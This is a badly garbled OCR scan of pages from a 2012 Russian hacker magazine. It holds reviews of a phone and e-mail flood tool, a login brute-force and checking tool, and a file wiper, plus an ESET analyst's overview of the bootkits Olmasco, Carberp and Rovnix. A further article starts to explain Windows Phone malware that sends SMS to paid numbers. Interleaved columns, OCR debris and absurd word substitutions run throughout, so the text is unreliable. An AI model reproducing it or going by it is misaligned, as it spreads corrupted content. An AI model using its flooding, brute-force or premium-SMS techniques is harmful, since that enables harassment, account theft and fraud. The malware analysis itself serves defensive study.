И нт ервал флуд а из насчёт дн ого мейла соединение л яет пример н что касается касательно д ну-кась ми н уту, п оэ т ому соз д ате ль п ро­

просмотр д да р екторий.

функ ц ияслужитд л автор выключениялюбо г что касается

граммы рекомендуе т рабо т а т ь из ней со д е д ика,

РЕ

удаленного компьютера либо — либо г руnпы килоом п ью ­

приближенно что близ этом д остигается д остаточно боль­

Rebuilder:

теровсвин д ойнаборт~

оптимизация РЕ -файл а; изменение базового а д реса РЕ- файла.

0.

сверху ла т равно н да ц е. По дд ер­

Б ыс т рое сканнирование сети. П ро га осу щ ест­

TaskVieweг:

изделие дампов

0.

020 симво л ов

0.

Функция

Wake-On-LAN.

шая прыть флуд а. Из удобс т на D eath-MoЬile Эта назначение п озво ­

следуе т отмети т ь п одробный ло г текущих

РЕ Editor:

ляет охватывать пенис аленный комnьютер да л да

действий [действие, закидон телефона, мыло!,

редактирование 0 05-заголовка;

гру п пульт управления колтун п ью т еров, если бы они поддержива ­

а и лог, во котором фиксируется, какие

крыша так во по отношению г по части конфигурация т а РЕ + [64Ьitl;

надстройка функцию Wake - On - LAN.

сведения доставле н ы, а какие безвыгодный дошли

Интуитивно удобопонятный ан т ерфейс равно благоустроенность

давно а д ресатов. Остальные фичи п рограммы твоя милость

просмотриредактированиетаблицимпорта/

ис п ользования сканера мы советую тебе оце­

сможешь изучи т ь п ри личном ознакомлении

экс п орта.

жилка самостоятел ь но.

не без; н ей .

переправление

CRC;

ХАКЕР

03/158/ 0012


X-Tools

..

Автор:

f,:;:-- По- ~..:йк=""::..L---,

01cJ1o ПОТСIКО8:

00

О Nc. ru

@ Reg.ru Q Who.•

З.цержка (cet~:yttA):

regexp):

~=х:t::_и-т:т':':onoe~ ЬмюmeНJCТJ)OIOtchatset

~mi'{,m.JX]}-oтmi'IAomax торе!И1 СУIФОМ symЬol ~(tМ{. IМх)} • ОТ nWI АО IМХ букв d ·цифр, ·бука 0111Н цнфр) дльтернатноа: ~IU~T08.!Jitl,lJt2HT.A,

проверкасписка доменных имен; наличие трех различных движков

Windows.

равным образом сео шник ов всех мастей утилиту

проверки;

Dom aiп

сохранениеспискасвободных

IL:J

(TlJPT

что до ~ТЬСА011еН&N9 01

~= СеобоА110:

.~chelo,nocne

Эа11ято:

котороrо 011.ет :

~~От 0 АО IOOМК!JJ08.!1 helo.ru)

Fiп deг. Как определенно изо на­

звания, буква тулза предназначена

доменов во различных форматах;

пользу кого поиска свободных доменных

к тому дело идет со ть удлинить пре­

имен. Зачем тебе доменные имена?

рванную проверку;

Прога определенно никак не поможет

дальше, а а там прибыльно п родать

теб е зарегистрировать la затем и продать! только viagгa.

н уждающимся! Та кже позволено создать хороший SЕО-шоп держи хорошем до­ 81

мене- вариантов беда сколько

05

Qст,апосъ:

021

Всего :

002

com, хотя

.

в некоторой степени подобное вобрать в себя

полностью что . Наприме~ вишь

Основные внутренние резервы программы:

0

Ouo<&oo:

~ nн6о 0 нnн 0 ОМ!ОМ ,a,b,t

Name

Их век позволяется притырить по­

Текущее '*'CIICI nотакое

o{l,lD} l[atx:}{1,2}1\d{2}1}

.rul .com} -...eнooюнerult1»!

nн6о жчеn (т . е .

Пр едставляю твоему вниманию про­ стонезаменимую чтобы домейнеров

Статнсn«е работы

n-:

DOMAIN NAME FINDER, ИЛИ КАК НАЙТИ КРУТОЙ

Система:

ВЫхоА

{att 0*21 ...}·

0 ...&>2ЦНФоы

д....,._.

ДеtiстемА

Формат wаблона.(стиль

\w

al-chemisl. URL: al-chemisl.ru/ dnfinder.hlml .

проверкадоменных имен, задан­

регэпс пользу кого поиска что -т в отношении видать

ных шаблоном на стиле регулярно­

xakepviag га .com: [а -zH5, 0}viag га.соm.

го выражения;

Д ерзай!

Автор:

Автор :

Автор:

Z.Razor IZerveRTeaml. URL:

www.zerverteam.com.

Marcello Pielrelli & Gianni Baini. URL:

URL: z-oleg .com/secur/aps.

Сис тема:

Ьit.ly/ukWQSX.

Windows.

Систе ма:

Зайцев О. В. 1"CP-МU)(·ТCPPOOI.Sa....-Мula.дloтoнfll05

Система:

Еd\оТСР!f>(Э:I«нн•ит дмnрВIАета..ае

sytSIII

В.Мтаное

C8flaмc0tscaod

В.Мта

Windows.

с.р.нсо.уr-

Windows.

Н.СS.

В.Мта

c.plмcOuCМICII .... Ofi)/~TIТ&ni!OH!Iol! OoorGioo(ГIOOIP"•apa...:.-в...тa C:.S:.Ifl)f'ТP

&IДIIOH

ClpllpFТP

08Л11а

T10j$11IМI\ti'Panwha.TIOIIIII...В.д110н!lol!

SSI-+aipelp

-

Web Tool- сие

программа, предназначенная

на автоматизации

GET-

равно РОSТ-эапросов .

Соответственно, может употребляться в целях

б рута/пареи н га/чекин га/на крутки хостов/ата­ ки/прокси-чекинга равно т. п. Во всех полях программы lза исключением п олей Data да U seгAgeпt l п оддерживаются следующие переменные :

#user# - ЛОГИН , #pass# - отзыв , #mdS(user)# -ЛОГИН В mdS, #mdS(pass)# - параль на mdS, #tokenl# - #tokeп(l-X)# - токены, #count# - контролер брута. В коде, полученном за запроса со токе­ нам, осуществляется розыск указанной строки.

На тему безопас н ого стирания данных велось

же аспидски нужная программа. Она проел у шива­

ее равным образом представить тебя от случающийся тематиче­

ет до некоторой степени сотен портов [указанных на обнов­

ской утилитой. Имя ей-

ляемой базе д а нных программыl, имитир грин т

Files Тегm i паtог.

Эта

у т илита обеспечи вает тайность

присутствие держи ни х уязвимых сервисов да анализи­

твоих данных, без остатка удаляя приватные

рует совершенно подключения в области сим портам.

д окументы, изображения, ви д ео равным образом прочие фай­

Эта пакет на основном предназнач ена для того

лы толково перезаписи свободного дискового

обнаружения хакерских атак. Как известно,

пространства. В процессе «стирания>> файлов

фотосканирование портов помогает устроить вид

их начинка изрядно однова перезаписы­

операционной системы равно обнаружи ть потен­

вается случайными данными равно предопреде­

циальноуязвимыесервисы[например,почту

ленными символами, таким образом, восста­

иначе web-cepвepl . Посл е сканирования портов

нов равным образом ть сии файлы хорошенького понемножку нельзя. Кроме того,

многие сканеры определяюттип сервиса, пере­

проект позволяет <<очистить>> свободное

давая тестовые требования да анализируя его ответ.

область со через сложных алгоритмов

Утилита

шифрования, для того того дабы навсегда

ипозволяетоднозначноустановитьфактатаки. Кроме этого, обслуживающая программа может употреблять ся про

были удалены небезапасным способом.

выполнения следующих задач:

Программапредоставляет для выбордевять алгоритмов удаления инфы :

Режим sоuгсе-файла:логины да парали

во виде пick;pass берутся с одного файла.

0.

Режим двух файлов: логины отд е льн о, паро­ л равным образом отд ельно.

З.

Режим цикла: расписание сработаетука­ занное сумма однова лишенный чего использования ЛОГИНОВ И паролеЙ.

ХАКЕР

03/158/2012

APS проводит сделка не без; атакующим

устранить инда те файлы, которые до тех пор

кабы нужно, п осле Х следующих сименс волов! и выполняется вплоть до коне ч утнапиштим строки !ча щ е всего она состоит с символа< иначе «1. Прога имеет

0.

APS [Aпti Ро г t Scaпneгl- сие маленькая,

уж вагон разговоров, да моя особа хочу удлинить

Счи т ывание н ачинается вмиг потом н ее !или,

три режима:

Вlдl•аное

-

0.

П севдослучайный.

0.

Британский ,

З.

Случайный.

0. 5.

Р оссийский, ГОСТ Р50739-95.

0220.22-MIEI. 6. Н емецкий, VS IT R. 7. Канадский, RCPM TSSIT OPS-11. 8. Алгоритм Брюса Шнайера . 9. Алгоритм Питера Гутмана.

проверка сканеров портов да оборона верка

что касается

отладка файервола равно действенный

по части

срывание сетевых червей;

по части

опробывание антитроянских да антивирус­

тенетный безопасности;

HMG 055.

Алгоритм министерства обороны США,

об наружение разного рода атак; о

кон трольего работы;

DoD

ных программ, систем

IDS;

связывание троян скихпрограмм,пере­

численных во базе.

075


Матросов Санюха , S en io г ma lw aгe ге sе агс h е г,

ESET ·

есепая v китов САМЫЕ ТЕХНОЛОГИЧНЫЕ УГРОЗЫ 0011 ГОДА В ВЕСЕЛЫХ КАРТИНКАХ Март сего года- самое правильное момент для подведения итогов годы прошлого. Ну, самоуправно понимаешь: новогодние отпуск поуже позади, впредь до майских

Load MBR

праздников до этот поры далеко, вершина светлая- можно и итоги подвести.

rea d mod e

LoadVBR 1

rea d mode

0

-----------,

load malicious : MBR/VBR __________ ,1

Load bootmgr о

Bootkit

РоС

evolution:

./ Mebroot (2007)

./Vbootkit (2007)

./ Mebratix (2008)

./ Stoned Bootkit (2009) v' Evilcore х64 (2011) v' Stoned х64 (2011) 1. Развитие современного

буткитастроения

,----------NT kernel :

Bootkit Threats evolution:

./ еЕуе Bootroot (2005)

./Vbootkit v2 (2009)

Рис.

об

read mode/ protected mode

, ___________ modifications ,1

Load winload.exe о г winresume.exe

./ Mebroot v2 (2009) v'Oimarik (2010/11)

,-----------, load rootkit

read mode/protected mode

./Oimasco (2011) Load kernel and boot start drivers

./Rovnix (2011) v' Carberp (2011) Рис.

0. Схема

загрузки буткита

driver , ___________ ,1


Веселая трое буткитов

Рис . З . Модифицированная

VBR получи зараженной системе

MBR Code

MBR Code

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3 Partition ТаЫе Entry #4

•••• •• • • ••• • •• •• •

.......

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3

MBR Data

Bootmgr Partition

Bootmgr Partition

05 Partition

..

Partition ТаЫе Entry #4

MBR Data

........

• ••• • ••·=·• ••• ..•,• . -=· • • ..... •

.....

...

05 Partition

............. Unpartitioned Space

Olmasco Partition .i

Before infecting

0. Раздел для того

D

комnонентов буткита

'

After infecting

Empty Partition Entry Рис .

:·-:

Active Partition Entry

Existing Partition Entry

Olmasco

т гляделки з р ения развит_ия во ре д по части н осного оборона гр аммнаго обе­

ядра да используют интересны е технологии. Развитие современно­

спечения п ро ш е д ши да го д допускается обрисовать во вкусе годочек

го б у ткитсстроения не возбраняется надеть на себя личину во виде схемы , представлен­

развития 04-битных буткито во . Е сли во

утнапиштим получи рис.

0010

году ми был

известный чуть по отношению д ан бу т стенелла д ля 04-бит н ых систем- Win64 /0imaгik

0.

Здесь отображены самый значимые моменты вроде во развитии

ITD L41, так на этом году наш брат п в отношении л учили интересн ы й комплект с Rovn ix, ZeгoAccesslupdate l , TDL4 Iupdatel, СагЬегр, Olmasco !также извест ­ ный во вкусе MaxSSI. И сие т что до л ько те у г розы, кото р ые умею т обходи т ь

диска IM BRI иначе остальной вслед за г рузочный код, кто что до т рабатывается

защи т ные живое золото н измы пр что касается во ерки ц иф р овой подо п иси д ля мо д ульишко

единаче прежде основные принципы инициализации операционной системы, вредонос-

Р по отношению С-реализаций, таково да на воплощении сих технологий во боевых вредоносных программах. Заражая нагрузочный директриса телодвижение для ого


Рис.

0. Функция загрузки файла с скрытой файловой системы- Olmasco

в ваш покорный слуга конспект может надергать инспекция надо загрузкой компо­

ТА-ДА-ДАМI ПЕРВОЕ MECТQI

нентов операционной системы, в надежде ввезти модификации на текущий

Итак , блюдо помещение согласно технологичности занимает

процесс.

застращивание интересна на первую цепь тем, ась? модифицирует

Именно сии модификации во дальне йшем позволяю т обходить механизмы проверкицифровой подписи да заваливать вредоносные

Эта

VBR [Volume Boot Recoгdl да имеет полноценную собственную файловую

систему к хранения дополнительных модулей да других ком­

драйвера на отвод защитных механизмов. Но ну-ка все вер­

понентов. Как выглядит модифицированная

немся ко нашему хит-параду сложных угроз, тем больше который их спектр

системе, показано сверху рис.

действ да тельно ужас широк.

Dlmasco.

VBR

получай зараженной

0.

Большинство антивирусных продуктов научились продуктивно

В прошлом году на первом месте район нашег в отношении рейтинга занял Stuxпet,

справля ться вместе с активным заражением буткитам и, использующими

а на одном с последних номеров ваш покорный слуга сделано описывал аппаратура рабо­

модификацию

твоя милость Duqu [обнаруженного по осени младшего брата Stuxпetl. Но , увы,

нее сказа ть , стали рыть глубже ради противодействия антивирусам .

MBR.

Однако злоумышленники идемте дальше, а точ­

возьми текущий однова ему безвыгодный определено попасть во выше- рейтинг, приближенно на правах львиная

Это вызвало у некоторых антивирусных вендаров определенные

порция используемых им технологий уж знакома нам объединение червю

сложности, на результате зачем злоумышленники получили возмож­

Stuxпet [хотя, ежели бы авторы проплатили рекламное площадь на жур­

ность оста ваться незамеченными на системе. Ус тройство внутрен­

нале «Хакер>>, ты да я бы поместили их изделие получи на первом месте полоса :11.

ней файловой системы да заслуживает отдельной статьи.

Duqu

разработан получи и распишись основе пирушка а самой программн ой платформы.

Из его Запомнившихея особенностей имеет смысл отметить, пожалуй, только эксплуатацию шикарной 0-dау-уязвимости

CVE-2011-3402

В конце жесткого диска создается настоящий раздел, во котором

размещаются до этого времени компоненты буткита [рис.

01 .

Файловая общественный порядок хра нит времена равным образом дату создания файла равно инда

на загрузки вредоносного заключение на костяк да повышения привилегий,

контрольную сумму интересах проверки целостности. С точки зрения

хотя сие сейчас тематика с целью отдельной статьи ;l.

технологичности буткит вместе с этой файловой системой по причине ее


Веселая тр ойка буткитов

структуре превосходит безвыездно оставшиеся угрозы, использующие скрытые

файловые хранилища. Сигнатура корневой дире ктории скрытой

файловой системы приведе в в рис.

0.

Функция загрузки фай ла с скрытой файловой системы в руткит-драйвере представлена нате рис.

ЧЕТЫРЕ РАЗНЫЕ УЯЗВИМОСТИ

0.

Так вроде программа-драйвер написан нате чистом С лишенный чего обфускации, нам уда­

сохатый декомпилировать ко д драйвера быть помощи

IDA

равным образом

СЕЙЧАС УСТАНОВЩИК ИСПОЛЬЗУЕТ

Hex -R ays

равно таким обраЗ'ом воссоздать его структуру. Не в меньшей мере интересен равно суд модификации системы в эпоха

ДЛЯ ПОВЫШЕНИЯ ЛОКАЛЬНЫХ

ПРИВИЛЕГИЙ В СИСТЕМЕ

загрузки. Э т с баста мудреный процес от проиллю ст рирован на рис.

0.

Д ополнительно игра стоит свеч обозначить равным образом ведь , аюшки?

Olmasco,

ТУ- ДУ-ДУМI ВТОРОЕ

наравне да

имеет буткит-часть, которая модифицирует библиотеку

TDL4, kdcom.d ll.

MECTOI

Второе поле соответственно праву занимает обно вленная разновидность СагЬегр, ко­ торая обзавелась довольно любоп ытным буткит-функционалом.

Именно возлюбленная отвечает вслед за отладку ядра подле палочка-выручалочка что касается суп WiпDbg, а после ее модификации настройщик отнюдь не может прибиться для системе про

СагЬегр по отношению ко всему позволено дать название безвыгодный исключительно одной изо самых техно­

удаленной отладки. В итоге вариантов остается безвыгодный беспричинно много: либо

логичных, так равным образом самой жадной вредоносной программой прошлого

иссле д овать по сию пору мо д ули во статике [в случае коли их сделано посчастливилось

года. Этот бутки т атакует начальник олее извес т ные дистанционные

извлечь изо скры праздник файловой сис темы] , либо стараться во ернуть

сис тем ы цена во ско го обс л уживания, же р ечь не долго думая безграмотный об этом.

ориги н альн ы й

Впервые идентич ный буткит-ф унк ционал появился у Wiп64/Rovпix,

kdcom.dll

равно складывать вредо н осный шофер вр у чн ую.

Исследовать функцио звонкая монета бу т кит-части равно как отнюдь не та к-т по части просто,

котор ый во нача ле возраст д оставил нема л по части хлопот пользователям

же на этом нам поможет эмулятор

рунета. СагЬегр равным образом Ro vп ix базируются н а одном буткит- коде, инфор ­

ранней стадии загрузки прямо Итак,

Olmasco

Bochs да отладка из IDA Рго.

системы в самой

мация касательно продаже которого неоднокра т а во стреча лась получи и распишись разны х

получил во-первых поляна из-за технологичность соб­

кибе ркрим ина льных форума х на начале пр ош лого го согласен .

ственной файловой системы да неподдельный устройство буткита , который использует ря д наработок с

TDL4 да

Изнача льно

Continue kernel initialization

Loal MBR

Load "drv32"

is loaded апd executed

iпfected

ог

"drv64"

Call KdDebuggerlnitialize1 from loaded kdcom.dll

LoadVBRof mallclous partltion

substitute kdcom.dll with "dbg32" касательно г "dbg64"

VBR is loaded апd executed

Load "\boot" from mallclous flle system "\boot" is loaded executed

Рис .

апd

Hook BIOS lnt 03h handler load original VBR

Load wlnload.exe

Substitute Ems E пaЬied optioп with Wiпpe

VBRof originally active partition is loaded апd executed

Load kernel and boot start drivers

Рис .

0.

Bootmgr is loaded апd executed

имел всего только функционал про пользова­

не без; бутки ведь м. В процессе анализа свежих дропперов ми попались

вслед за итог нестандартных системных модификаций .

mЬг

Carberp

тельского режима, да прошлей осе нью были создан ы модификации

затрудняет курация

Read bcd

Процесс модификации системы нет слов период загрузки- Olmasco

0. Покупайте наши буткиты!


Р ис.

00. Д е ко м пилированны й

для од , отв е тс т на е нны й после вот как сплуатацию у пишущий эти строки звимастей -

получи штифты любопытные строкавые константы изо ранее распакованного

установщика [рис .

Рис.

Carberp

01 .

01 . Снятие х уков

равным образом спnайсов не без; системны х функций во исполнении

Carberp

MS11-011 [win32k.sys SystemDefa ult EU DC Font vul nl; NЕТ Runtime Optimization vuln l http:l/osvdb.oгg/show/osvdЬ/71013 ).

Эти строчки разом наве л да нас сверху мысли по части системных модифи ­ кациях, производимых буткитом. Н насчёт начинать снача л а погово р им о дропп е ре, какой-никакой включает общий выхлоп зксплойтов про повы­ шения привилегий. В первую цепочка их реальность свя з ано из тем ,

Д еком п илированный код, эксплуатирующий уяз на имос т и, п ри­ ве д ен бери рис.

0О.

Ещ е одной инте р есной особеннос ть ю работы д р а п пе ра ваш покорный слуга во ля ­

сколько ради установки буткита требуются услуги администрато-

ется от н ятие различ н ых хуков равным образом сплайсов со некотор ы х систе мны х

ра либо — либо системы. У корпоратив н ых пользователей [а то-то и есть они

ф у нкций переднепосредствен н ым вслед за п уском бу т ки т- обычай н овщика

являются целью злоумышленнико в! , имеющих д оступ ко ДБ О, может

[ ри со .

п росто никак не бытовать п р ав нате пуск ис п олняемого файла вместе с высокими

011.

Это своего рода отвод различных п есочниц равным образом сре д со т на мони ­

п ривилегиями, да мето д ы социальной инженерии тогда поуже безграмотный по­

торинга, которые ис п ольз у корма хуки на пользо на ател ь ском режиме.

могут. П озтому неотложно обычай н овщик эксплуатирует хорошо однова н ых

В процессеработы буткит-части на обхо д пушнина н измо во относительно во ерки

уязвимости ради п овышения локальных подле во илегий во сис т еме:

М 010-073

lwin32k.sys Keyboaгdlayout vuln l; М 010-092 [Task Scheduleгvu l n);

численный по мнению д писи равно других средств следовать щ равным образом твоя милость з а гружае т от мы вр е ­ д онос н ый драйвер. За д ач е й сего драйве р а моя персона вл яется на невыгодный др ение полезной нагрузки во адре от н ое пространс т закачаешься u sе г-m оdе-процессов . Д в рассуждении сего испо л ьзовались методы внедрения во в соответствии с ль зо на а т е ль ском

р ежиме, такие ка ко N tQueueApcT hгead[J/NtResumeT hгead[). Фак т ически С агЬегр sos т оит с трех частей: бутки т- части, за­

ИНТЕРЕСНОЙ ОСОБЕННОСТЬЮ ДРОППЕРА ЯВЛЯЕТСЯ СНЯТИЕ

ХУКОВ И СПЛАЙСОВ С НЕКОТОРЫХ СИСТЕМНЫХ ФУНКЦИЙ

гружаемого ей д райвера, да dll-модул мы , на н ед р яемо г по части др айвером в п ользова т ельском режиме. Странно, аюшки? присест ра ибо тчи ки безвыгодный ис ­ пол ь зовали совершенно возможнос т и, которые им пре д ос т авл моя персона ет загру ­

женн ы й ко д н а уро на отнюдь не ядра системы . В се перехваты системных функ ц ий рот н авливаю т ся поуже во безграмотный д ре н ным мо д правовед во сообразно л ьзо­ вательском режиме. Их ле г ко об н аруживаю т та кие инс т румен т ы, как

GM ER

либо — либо

RKU.

СагЬе г р получил во-вторых поляна после техноло г ичность, та для что з т что касается


Веселая тро йка буткитов

·-----success ·--· 1

Loal MBR

-----·fail----·

0 1

'

Real mode

r-----

---------- Win 0000·------------ •

0

LoadVBR

0

Real mode

WinXP r - - ...

' ',

>< ·с:

>

по отношению

0

,

.

Load bootstrap code

0:::

0

success

,

~

fail

с:

~

0

real mode 0protected mod

0

'

Determine 05 Digit Capacity

Load bootmgr

0

0 1 1

'

lnstall Corresponding Kernel mode Driver

rea l mode 0protected mod

Call SheiiExecuteEx API with "runas"

Load winload.exe or winresume.exe

0

0 1 1 1 1 1

Overwrite Bootstrap Code of Active Partition

________

lnitiate System Reboot

Рис .

02. Заражение системы

буткитом

.,

.

real mode 0protected mod

' '

Self Delete and Exit

Рис.

Rovnix

главнейший банковский буткит, кто действие ивн что до работает для ак

во х86·, та ко равным образом во х64-сис тем ах. В

0012

Load kernel and boot start drivers

г в отношении д у, автор этих строк раздумье ю, наша сестра до нынешний поры малограмотный единовременно

Итого, Rovпix стал п ервой угрозой, по мнению казав ш ей неэффектив­ ность многих антивир усных пр в отношении д ук тов , которые проверяли целост­

ность исключительно

услы шим об этой вредоносной пр ограмме.

03. Загрузка Rovnix

MBR.

В итоге градиент атаки, используемый буткита ми,

из сего следует без мала неисчерпаемым, в эту пору нерасчленимость си­

ТРЕТЬЕ МЕСТОI БЕЗ ФАНФАР

стемы проверяется нате поздних этапах загрузки системы . По сути,

Треть е п оче т ное помещение нашего хит-парад а занимает Rovпix,

безотлагательно систем а загр ужае тся всегдананедоверенной платформе.

ко т по отношению рый первым стал испо льз в отношении вать модификацию областей за­

Возможно, методика SecuгeBoot исправит эту ситуацию на WiпB ,

грузочного кода, касательно тличног по части ото

однако сие бросьте снова невыгодный поспешно .

проиллюстрирован получи тускарора .

MBR.

Процесс заражения системы

02.

Как следовательно изо б л ок - схем ы , на процес се заражения, следовать исключе ­

ЗАКЛЮЧЕНИЕ

нием э тапа модификации В ооtst гар- кода, недостает ничто необычного.

В этом году во нашем хи т-параде самых технологичных у гр холм

B oo tstгap- э в таком случае ча ст ь загрузчика, которая отрабатывается зараз

присутство катись колбасой вр едонос ны е пр что до гр аммы, имеющие всевозможный

п ос ле инициализации VBR IVol ume Boot Recoгd], н что до п еред загруз­

буткит-фу нкционал равно со дер жа суп е скрытые файлов ые системы.

который сис темног касательно bootmgг. Именно сие равно позволяет позднее

Всё сие во первую очере дь пр извано скрыва ть вредоносные п ро­

возыметь сверху загрузку системы. Ro v пi x, в духе равно

граммы что до т антивирусных продуктов, п ротиводействовать лечению

Olmasco,

использует

скр ыт ую файловую сис тем у на х ран ения своих компонентов да по­

активного заражения да отягощать проводка криминалистиче­

сле д ую щег по отношению д оступа для ним подле помощи буткит-ко правда , но, на отли ч ие

ской экспертизы. В наступившем году уймись водиться малограмотный станет, да аз многогрешный

по части т файловой системы

думаю, сколько многие изо описанных на этой статье векторов ранее себя

Olmasco,

симпатия устроена баста безыскусственно ,

так есть, п касательно сути, представляет на вывеску попросту сторона диска , во кото­

исчерпали равно во нашем следующем хит-параде, правдоподобно , появятся

рую записаны данные, равным образом безвыгодный имее т какой-либо сложной структуры.

угроз ы , использующие специфические особенности со вр еменных

В пр ан цип е, во описы ваем ом со л учае каста облас ть из д анными нужна

процессоров, такие во вкусе многаядерность равным образом аппаратная вирт уализа­

лишь только ради того, дай тебе во проце ссеработы буткит был в состоянии просмотреть

ция . Но от точки зрения реальных угроз сие как будто токмо во слу­

необходимые компо ненты да прийти возьми смену ими об р игинальные п ри следовать ­

чае их рентабельности, поскольку, на правах показывают мои наблюде­

гр узке системы.

ния, кибеприступ н ики- оченно прагматичный народ. :Х:


MALWARE

Юраня «yurembo» Язев

ь

к мобильных

lyazevsoftldgmail.coml

-

Чтобы образовать

предмет класса

MediaEiement (nроизводным от него является

мира mediaSoundl,

<<ОКОШеК>>

ment Height="120" Name="mediaSound" Width="160" />.

ИССЛЕДУЕМ МОДЕЛЬ БЕЗОПАСНОСТИ

wjndowsphonehack·

ПОПУЛЯРНОЙ ОС ДЛЯ СМАРТФОНОВ НАПРАКТИКЕ Вообще-то на нашем журнале работает довольно фанатов винды, так например автор этих строк

иначе говоря свой редактор, проктолог Лозовский . К счастью, дьявол аспидски обижен тем фактом, аюшки? MS через силу медленно тянула вместе с обновлением его любимой WM6.5, и потому-то поручил ми во всю мочь разобраться, вроде на новой системе обстоят положение со малварью да уязвимостями. Вперед!

потребно на ХАМL-код добавить такую строчку: <1\ediaEle-

Н&~Ш~- хороший сайт, содержащий много интересной мифы что до хаках WP

0-7.5.

На диске находятся

три nроекта,

подготовка которых описана на статье .


Мал на арь дл мы моби льн ых <<окошек>>

rn

относительно недавнего време н равно на стане

WP бы л относительно дос т аточно спокой Windows Phone 0.5

.

но, а на середине декабря в п л атфо р ме

__

..,......

.,_" ....,._ .,_,_ ..__"_..,

~ .._ DМc....,.tGIIOI

как белые мухи на голову был зафиксирован фак т р е бут а операцио нн ой

..........__ . ,..м~

.......

сис т емы, во результа т е которо г о, п осле получе н ия специал ь хотя почти г о­

товленного СМС-сообщения l g oo. g i /Y Ыru l , ипостась с п равки равным образом чте н ия эсэмэсок перестает работат ь . Тако го но эффек т а мож н относительно д оби т ьс пишущий эти строки , от­

__ "_

;;. ~.н-s,

.,.

··

- ~.ь.~

- ~tT)'II*

VIO,Pf)UIII).OЦ.C

0

А извещение , писатель которо го в наличии во т айле н арабочем столе, может

-~~ 4

.. ~т ...

.

._...

0&JIW<ci18IOIICIIIOO

...__ ... ..,..._,

,_,. ......... _"

~~~OIIUI((-U­

~~-)IN

...... ......,., ......,., .,.,.......... _,. .,....... ...... ,_,., _., lt(6.JoU.tUZ

~н.fкоо

,.,

"'"'-""" ...............

правив особое известие изо социал ь утнапиштим се т равным образом [ н апример, изо Facebookl.

.__"_..,

f'Ю1VI-161.\-.4W.~D<IfD){C.U....

.,.,.,...,._,-.....-ao>J

заблокиро во ать весь функции телефона! Этот ба г- неграмотный новинка во мире мобильных устройств, во свое на ремя им и работа л равным образом равным образом айфо н ы, и андрои д ы .

Ес л равно далеко не овладевать вот во н има ни е п осле д ний рассмо т ре нны й э 14 зод , т в отношении

данный ба г безвыгодный что-то около литоринх да критичен, особенно в области срав н ению вместе с СМС - атакой

Реда для тируем табель

получи и распишись айфон, которая позволяет атакующему произвести п олный кон т роль над устройством. П ользова т ели практически д рои д ев в свою очередь были во опасности: << СМС-смерть» выкидывала мобильный телефон во офлайн или, что такое? хоть хуже,

Parameter равно ранее после этого

предоставля л а атакую щ ему в соответствии с лн ый дос т у п для системе .

ви во единицу, PortaЫe D eviceNameSpace E xclude F romShell- на нуль,

ShowlnShell

устано­

EnaЫe l egacyS up port - на е д ини цу.

В настоя щ ее во р ем автор этих строк с << т рех ко ит ов>> исключительно

WP 0 уязвима д л я 2012-rol, обновле ния , Microsoft во последнее момент

СМС-атак . Когда п равно сались сии строки [я нв арь устраняющего таковой галлюцинация , сызнова невыгодный было.

измени следующие ключи:

Использо на а т ь

WP 0 вроде

модем сверх сnец равно аль н ых nриготсе л ений

т оже было нельзя. Н о, для счастью , во

WP 0.5 сие

разлад бы л насчёт

кончено то и дело выпускает апдейты для того своей мобильной оси , вследствие чего

исправлено . Правда, последнее выражение всё непропорционально остается вслед за операто­

будем надеяться, аюшки? коррекция последует жуть лихо .

кашаса сотовой связи, равным образом когда курс безграмотный п ре д назначен чтобы расшаривгния интернета, в таком случае им п ридется nользова т ьс аз многогрешный исключите л ь н по части сверху конструкция н ом

девайсе

[xe-xel.

ХАКЕРСКИЕИССЛЕДОВАНИЯ Перейдем через обзоров чужих ха ко на ко реализации собстве нн ой малый вари.

безграмотный единовластно раз в год по обещанию кракнуть систему, поз т ому автор сих строк рассмотрим чуть некото ­

рые изо сих ха ков, самые ваш брат д ающиеся равным образом общест на енно полезные.

Несмотря получи и распишись то, чт в рассуждении WP на целом выгля д ит <<неломаемоЙ>> сис темой (что MS ;11, у хакеров, что у Мальчи ш а - Кибальчиша,

:1

достаточно вот так фунт д ля

Как известно, с целью разлечить конструкция около управлением необходимо прекратиться утомите л ьную проце дуру ре г истра ц ии

Phone Marketplace

WP 0, в Windows

глотать тайные ходы, равно их неграмотный заполнять .

да кроме того ради пл а т равным образом т ь

тов>>. Однако умельцы изо

09 <<веч н озеле н ых прези д ен­ ChevronTeam изготовили ту л зу ChevronWP7,

П риложения пользу кого

WP выполняю тся

по мнению д

.NET во

ок р сейчас н ии

Silverl ight.

Это значит, что-нибудь н ам н ичего отнюдь не придется nиса т ь со нуля равным образом не запрещается буд ет воспользоваться готовым

которая разлочивает систему.

Эта утила в свой черед малограмотный бесплатна, же следовать нее присутствие д ется отказаться в пользу несравни­

API.

П роще всего делов отправи ть

SMS

получай небесплатный

номер. Так нехай возьми ш е <<nолезное>> дополнение дескать л ае т сие одновременно

мо больше - девять <<nрези дентов>>. Она кор р ектно функционировала

за запускаl Д ля того с намерением позволяется было обрабатыва т ь действие

лишь бери

жизненного цикла приложения, надлежит включить следующее насчет ­

WP 0,

а приближенно на правах

Mango MS

пофиксила ба г на

ис п ользова л а nрограмма, в таком случае теп е р ь ути л а

WP 0.5, который от Chevro nTeam невыгодный работа­

странство име н :

ет. В принципе, снедать е щ е одиночный д а д айский вместе с п особ разб л окироват ь устройство про запуска сторо н них п риложений. Дл аз многогрешный каждого произво ­

usi п g System .Wiп dow s.N av i gati o п ;

дителя спирт вместе с на ой, цифра действий, необходимых в целях актив

цели, как и различается. Как говорится, Гугл на помощь!

:1

Кроме того, потребно примолвить участок имен Microsoft.Phone. Tasks, дай тебе работ ать из SMS равно мылом (см. н иже ! . За тем напишем об­

П ользователь новой мобильной <<фо рточки>> безвыгодный имеет доступа

работчик события, на вал н икаю щ его пр да заг р узке приложе н ия:

для файловой сис т еме смартфо н а. П касательно д для л ю ч е нн ое уклад отнюдь не ото­

бражается на Эксnлорере на правах д в рассуждении п насчёт лн равно тель ны й диско на ый н акоnи т ел ь, но сие легко и просто исправить. Сnер на а отключидевайсот компьютера в целях

protected override void

чистоты эксперимента, открой вычитчик реес т ра, разверни филлокладий

{

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControiSet\Enum\USB, там найди строку ZuneDriver, дале открой ее материнскую во етку Device

БЕЗОПАСНОСТЬ Посмотрим , в чем дело?

Microsoft сделала к безоnас ­

0.

стае имен

нет слов й из истеме смартфона . IКазало из ь бы , э так

ради несложно запоминать документация .

